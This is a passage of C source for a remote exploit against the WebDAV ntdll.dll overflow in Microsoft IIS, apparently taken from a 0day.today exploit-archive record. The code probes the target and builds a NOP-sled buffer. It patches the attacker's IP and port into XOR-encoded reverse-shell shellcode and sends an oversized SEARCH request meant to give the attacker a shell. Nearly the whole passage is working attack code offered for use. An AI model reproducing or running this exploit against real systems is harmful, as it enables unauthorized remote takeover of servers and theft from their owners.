1;\r\n}\r\n\r\nsprintf(search,\"SEARCH / HTTP/1.1\\r\\nHost: %s\\r\\n\\r\\n\",host);\r\nhmm.sin_port = htons(80);\r\nhmm.sin_family = AF_INET;\r\nhmm.sin_addr = *((struct in_addr *)heh->h_addr);\r\n\r\nif ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){\r\nprintf(\"error: can't create socket\");\r\nreturn 1;\r\n}\r\n\r\nprintf(\"Checking WebDav on '%s' ... \",host);\r\n\r\nif ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){\r\nprintf(\"CONNECTING_ERROR\\r\\n\");\r\nreturn 1;\r\n}\r\nsend(sock,search,strlen(search),0);\r\nrecv(sock,buf,sizeof(buf),0);\r\nif(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')\r\nreturn 0;\r\nprintf(\"NOT FOUND\\r\\n\");\r\nreturn 1;\r\n}\r\n\r\nvoid help(char *program)\r\n{\r\nprintf(\"syntax: %s <victim_host> <your_host> <your_port> [padding]\\r\\n\",program);\r\nreturn;\r\n}\r\n\r\nvoid banner(void)\r\n{\r\nprintf(\"\\r\\n\\t [Crpt] ntdll.dll exploit trough WebDAV by kralor\r\n[Crpt]\\r\\n\");\r\nprintf(\"\\t\\twww.coromputer.net && undernet #coromputer\\r\\n\\r\\n\");\r\nreturn;\r\n}\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\nWSADATA wsaData;\r\nunsigned short port=0;\r\nchar *port_to_shell=\"\", *ip1=\"\", data[50]=\"\";\r\nunsigned int i,j;\r\nunsigned int ip = 0 ;\r\nint s, PAD=0x10;\r\nstruct hostent *he;\r\nstruct sockaddr_in crpt;\r\nchar buffer[65536] =\"\";\r\nchar request[80000]; // huuuh, what a mess! :)\r\nchar content[] =\r\n\"<?xml version=\\\"1.0\\\"?>\\r\\n\"\r\n\"<g:searchrequest xmlns:g=\\\"DAV:\\\">\\r\\n\"\r\n\"<g:sql>\\r\\n\"\r\n\"Select \\\"DAV:displayname\\\" from scope()\\r\\n\"\r\n\"</g:sql>\\r\\n\"\r\n\"</g:searchrequest>\\r\\n\";\r\n\r\nbanner();\r\nif((argc<4)||(argc>5)) {\r\nhelp(argv[0]);\r\nreturn;\r\n}\r\n\r\nif(WSAStartup(0x0101,&wsaData)!=0) {\r\nprintf(\"error starting winsock..\");\r\nreturn;\r\n}\r\n\r\nif(test_host(argv[1]))\r\nreturn;\r\n\r\nif(argc==5)\r\nPAD+=atoi(argv[4]);\r\n\r\nprintf(\"FOUND\\r\\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\\r\\n\",PAD,PAD);\r\n\r\nip = inet_addr(argv[2]); ip1 = (char*)&ip;\r\n\r\nshellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];\r\nshellc0de[451]=ip1[3];\r\n\r\nport = htons(atoi(argv[3]));\r\nport_to_shell = (char *) &port;\r\nshellc0de[446]=port_to_shell[0];\r\nshellc0de[447]=port_to_shell[1];\r\n\r\n// we xor the shellcode [xored by 0x95 to avoid bad chars]\r\n__asm {\r\nlea eax, shellc0de\r\nadd eax, 0x34\r\nxor ecx, ecx\r\nmov cx, 0x1b0\r\nwah:\r\nxor byte ptr[eax], 0x95\r\ninc eax\r\nloop wah\r\n}\r\n\r\nif ((he = gethostbyname(argv[1]))==0){\r\nprintf(\"error: can't resolve '%s'\",argv[1]);\r\nreturn;\r\n}\r\n\r\ncrpt.sin_port = htons(80);\r\ncrpt.sin_family = AF_INET;\r\ncrpt.sin_addr = *((struct in_addr *)he->h_addr);\r\n\r\nif ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){\r\nprintf(\"error: can't create socket\");\r\nreturn;\r\n}\r\n\r\nprintf(\"Connecting... \");\r\n\r\nif ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){\r\nprintf(\"ERROR\\r\\n\");\r\nreturn;\r\n}\r\n// No Operation.\r\nfor(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);\r\n// fill the buffer with the shellcode\r\nfor(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);\r\n// well..it is not necessary..\r\nfor(i=0;i<2500;buffer[i]=PAD,i++);\r\n\r\n/* we can simply put our ret in this 2 offsets.. */\r\n//buffer[2086]=PAD;\r\n//buffer[2085]=PAD;\r\n\r\nbuffer[sizeof(buffer)]=0x00;\r\nmemset(request,0,sizeof(request));\r\nmemset(data,0,sizeof(data));\r\nsprintf(request,\"SEARCH /%s HTTP/1.1\\r\\nHost: %s\\r\\nContent-type: text/xml\\r\\nContent-Length: \",buffer,argv[1]);\r\nsprintf(request,\"%s%d\\r\\n\\r\\n\",request,strlen(content));\r\nprintf(\"CONNECTED\\r\\nSending evil request... \");\r\nsend(s,request,strlen(request),0);\r\nsend(s,content,strlen(content),0);\r\nprintf(\"SENT\\r\\n\");\r\nrecv(s,data,sizeof(data),0);\r\nif(data[0]!=0x00) {\r\nprintf(\"Server seems to be patched.\\r\\n\");\r\nprintf(\"data: %s\\r\\n\",data);\r\n} else\r\nprintf(\"Now if you are lucky you will get a shell.\\r\\n\");\r\nclosesocket(s);\r\nreturn;\r\n}\r\n\r \n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8289"}]}
